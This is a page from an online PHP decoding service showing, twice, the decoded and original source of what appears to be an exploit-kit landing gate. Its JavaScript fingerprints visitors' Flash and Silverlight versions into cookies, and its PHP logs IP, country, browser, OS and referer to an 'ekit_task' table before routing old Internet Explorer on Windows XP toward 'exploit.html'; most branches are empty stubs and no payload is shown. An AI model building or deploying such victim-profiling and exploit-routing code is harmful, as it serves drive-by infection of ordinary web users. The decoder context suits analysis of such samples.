Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<script language="javascript" type="text/javascript" src="../../js/hunter.js"></script> <..
Decoded Output download
<script language="javascript" type="text/javascript" src="../../js/hunter.js"></script>
<script language="javascript" type="text/javascript">
function getFlashVersion(){
try{
try{
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
try{axo.AllowScriptAccess = 'always'; }
catch(e) { return '6,0,0'; }
}
catch(e) {}
return new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').replace(/\D+/g, ',').match(/^,?(.+),?$/)[1];
}catch(e){
try{
if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).description.replace(/\D+/g, ",").match(/^,?(.+),?$/)[1];
}
}catch(e) {}
}
return '0,0,0';
}
var version = getFlashVersion();
var vArr = version.split(',');
//document.write (typeof(version)) ;
//var version = document.cookie;
document.cookie ="version="+version;
var silver = GetSilverlightVersion();
//document.write(silver);
document.cookie ="silver="+silver;
</script>
<?php
include('../../includes/detection.php');
include('../../includes/functions.php');
require_once('../../config/mysql.class.php');
require_once('../../config/config.inc.php');
echo "<script src='../../assets/js/jquery-1.9.1.js'></script>";
if(isset($_COOKIE["version"])){
$version = $_COOKIE["version"];
}
$v = explode(',',$version);
$date = date('M j G:i:s Y');
$ua = $_SERVER['HTTP_USER_AGENT'];
$ip = getIp();
$co = getcountry($ip);
$country = getCNameByCCode($co);
$os = ua2os($ua);
$browser = parse_user_agent($ua);
$browser_type = $browser['browser'];
$browser_version = $browser['version'];
$browser = $browser_type.$browser_version;
$referer = getenv('HTTP_REFERER');
if($query = mysql_query("INSERT INTO ekit_task_taskname(ip,country,browser,os,ostype,referer,date)VALUES ('$ip','$country','$browser','$os','$ostype','$referer','$date')"))
if(($browser == "MSIE6.0") || ($browser == "MSIE7.0") || ($browser == "MSIE8.0") && ($os == "Windows XP") || ($os == "Windows Server 2003")){
if($v[0] == "20" || $v[0] == "21") {
if(strcmp("null",$silver) != 0){
header("location:/task/taskname/735fa01e7de0f353301738834b9e4782");
}else{
echo "IE,flash";
echo "redirect to exploit.html";
}
}
elseif($v[0] == "18" || $v[0] == "19"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif ($v[0] == "17") {
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] == "16"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="15"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="14"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="13"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="12"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] = "disable"){
if(strcmp("null",$silver) != 0){
}else{
}
}
}
elseif(($browser == "MSIE8.0") || ($browser == "MSIE9.0") || ($browser == "MSIE10.0") && ($os == "Windows XP") || ($os == "Windows Server 2003"))
{
if($v[0] == "20" || $v[0] == "21") {
if(strcmp("null",$silver) != 0){
}else{
}
}
elseif($v[0] == "18" || $v[0] == "19"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif ($v[0] == "17") {
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] == "16"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="15"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="14"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="13"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="12"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] = "disable"){
if(strcmp("null",$silver) != 0){
}else{
}
}
}
elseif($browser == "MSIE11.0")
{
if($v[0] == "20" || $v[0] == "21") {
if(strcmp("null",$silver) != 0){
}else{
}
}
elseif($v[0] == "18" || $v[0] == "19"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif ($v[0] == "17") {
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] == "16"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="15"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="14"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="13"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="12"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] = "disable"){
if(strcmp("null",$silver) != 0){
}else{
}
}
}
?>
Did this file decode correctly?
Original Code
<script language="javascript" type="text/javascript" src="../../js/hunter.js"></script>
<script language="javascript" type="text/javascript">
function getFlashVersion(){
try{
try{
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
try{axo.AllowScriptAccess = 'always'; }
catch(e) { return '6,0,0'; }
}
catch(e) {}
return new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').replace(/\D+/g, ',').match(/^,?(.+),?$/)[1];
}catch(e){
try{
if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).description.replace(/\D+/g, ",").match(/^,?(.+),?$/)[1];
}
}catch(e) {}
}
return '0,0,0';
}
var version = getFlashVersion();
var vArr = version.split(',');
//document.write (typeof(version)) ;
//var version = document.cookie;
document.cookie ="version="+version;
var silver = GetSilverlightVersion();
//document.write(silver);
document.cookie ="silver="+silver;
</script>
<?php
include('../../includes/detection.php');
include('../../includes/functions.php');
require_once('../../config/mysql.class.php');
require_once('../../config/config.inc.php');
echo "<script src='../../assets/js/jquery-1.9.1.js'></script>";
if(isset($_COOKIE["version"])){
$version = $_COOKIE["version"];
}
$v = explode(',',$version);
$date = date('M j G:i:s Y');
$ua = $_SERVER['HTTP_USER_AGENT'];
$ip = getIp();
$co = getcountry($ip);
$country = getCNameByCCode($co);
$os = ua2os($ua);
$browser = parse_user_agent($ua);
$browser_type = $browser['browser'];
$browser_version = $browser['version'];
$browser = $browser_type.$browser_version;
$referer = getenv('HTTP_REFERER');
if($query = mysql_query("INSERT INTO ekit_task_taskname(ip,country,browser,os,ostype,referer,date)VALUES ('$ip','$country','$browser','$os','$ostype','$referer','$date')"))
if(($browser == "MSIE6.0") || ($browser == "MSIE7.0") || ($browser == "MSIE8.0") && ($os == "Windows XP") || ($os == "Windows Server 2003")){
if($v[0] == "20" || $v[0] == "21") {
if(strcmp("null",$silver) != 0){
header("location:/task/taskname/735fa01e7de0f353301738834b9e4782");
}else{
echo "IE,flash";
echo "redirect to exploit.html";
}
}
elseif($v[0] == "18" || $v[0] == "19"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif ($v[0] == "17") {
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] == "16"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="15"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="14"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="13"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="12"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] = "disable"){
if(strcmp("null",$silver) != 0){
}else{
}
}
}
elseif(($browser == "MSIE8.0") || ($browser == "MSIE9.0") || ($browser == "MSIE10.0") && ($os == "Windows XP") || ($os == "Windows Server 2003"))
{
if($v[0] == "20" || $v[0] == "21") {
if(strcmp("null",$silver) != 0){
}else{
}
}
elseif($v[0] == "18" || $v[0] == "19"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif ($v[0] == "17") {
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] == "16"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="15"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="14"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="13"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="12"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] = "disable"){
if(strcmp("null",$silver) != 0){
}else{
}
}
}
elseif($browser == "MSIE11.0")
{
if($v[0] == "20" || $v[0] == "21") {
if(strcmp("null",$silver) != 0){
}else{
}
}
elseif($v[0] == "18" || $v[0] == "19"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif ($v[0] == "17") {
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] == "16"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="15"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="14"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="13"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] =="12"){
if(strcmp("null",$silver) != 0){
}else{
}
}elseif($v[0] = "disable"){
if(strcmp("null",$silver) != 0){
}else{
}
}
}
?>
Function Calls
| None |
Stats
| MD5 | dedd9d477d8a88bc67e9228dac6feb56 |
| Eval Count | 0 |
| Decode Time | 103 ms |